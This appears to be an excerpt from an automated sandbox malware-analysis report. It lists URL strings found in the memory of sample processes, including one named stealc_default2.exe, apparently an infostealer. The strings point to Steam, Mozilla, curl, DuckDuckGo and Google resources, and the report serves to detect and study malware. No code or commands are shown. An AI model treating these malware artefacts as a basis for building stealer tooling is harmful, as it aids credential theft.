Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=ljhW-PbGuX
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&amp;l=english&am
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&amp;l=engli
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1&amp;
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&amp;l=en
Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=uDUW
Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=bOP7RorZq4_W&amp;l=englis
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=UuGFpt56D9L4&amp;l=
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=engli
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=KkhJqW2NGKiM&amp;l=engli
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp;
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=2UcHUv7TDL_s&amp
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=engl
Source: new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=
Source: new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=Ff_1prscqzeu&amp;
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/log
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/R
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2234480460.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2234480460.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: Offnewhere.exe, 00000012.00000000.1986602049.000000000061B000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: Offnewhere.exe, 00000012.00000000.1986602049.000000000061B000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: https://curl.se/docs/hsts.html
Source: Offnewhere.exe, 00000012.00000000.1986602049.000000000061B000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: chrome.exe, 0000002B.00000002.2760490321.00002B3C004C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2763383332.00002B3C00734000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000002B.00000002.2760490321.00002B3C004C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2763383332.00002B3C00734000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: chrome.exe, 0000002B.00000002.2703874882.00002B3C0000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=
Source: chrome.exe, 0000002B.00000002.2703874882.00002B3C0000C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?q=searchTerms
Source: stealc_default2.exe, 00000011.00000003.1992187439.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2178680224.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2368715722.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2405275859.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: stealc_default2.exe, 00000011.00000003.1992187439.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2178680224.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2368715722.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2405275859.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab_
Source: chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.ico
Source: stealc_default2.exe, 00000011.00000003.1992187439.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2178680224.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2368715722.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2405275859.00000000057FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: svchost.exe, 00000023.00000003.2158177683.000002998D659000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000023.00000003.2158177683.000002998D600000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: chrome.exe, 0000002B.00000003.2259650975.0000229800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 0000002B.00000003.2259650975.0000229800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 0000002B.00000003.2265759074.00002298006E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703524503.000022980078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google-ohttp-relay-safebrowsing.fastly-edge.com/
